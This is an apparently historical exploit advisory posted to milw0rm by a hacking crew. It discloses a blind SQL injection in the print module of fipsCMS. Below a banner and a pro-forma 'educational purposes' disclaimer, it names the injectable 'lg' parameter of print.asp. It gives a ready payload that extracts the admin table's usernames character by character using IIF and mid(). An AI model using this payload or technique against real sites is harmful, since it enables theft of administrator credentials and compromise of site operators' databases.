|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | _ __ __ __ ______ | | /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | | /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | | \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | | \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | | \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | | \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | | \ \____/ >> Kings of injection | | \/___/ | | | |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| Title :: Blind SQL Injection Author :: InjEctOr [s0f (at) w (dot) cn] && Hak3r-b0y [hak3r-b0y (at) hotmail (dot) com] Application :: fipsCMS [Print Module] Download :: http://www.fipsasp.com/home/index.asp?lg=1&w=pages&r=52&pid=73 Dork 1 :: Use ur mind ! ShoutZ :: Allah ,xError,ProViDor,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts. --------------------------------------------[C o n t e x t]----------------------------------------- Vulnerability: http://localhost/fipsCMS/modules/print.asp?lg=[SQL] Example : //IIF((select%20mid(last(username),1,1)%20 from%20(select%20top%2010%20username%20from%20admin))='a',0,'ko') -------------------------------------------[End of context]---------------------------------------- # milw0rm.com [2008-05-07]